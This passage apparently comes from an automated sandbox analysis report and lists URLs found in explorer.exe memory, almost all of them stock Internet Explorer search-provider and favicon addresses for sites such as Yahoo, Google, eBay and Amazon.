Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000007.00000000.2183037587.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000007.00000000.2183037587.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000007.00000000.2176816601.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000007.00000000.2185297080.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000007.00000000.2183037587.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2184896064.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000007.00000000.2184896064.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000007.00000000.2183037587.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000007.00000000.2176816601.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2184896064.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2183037587.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
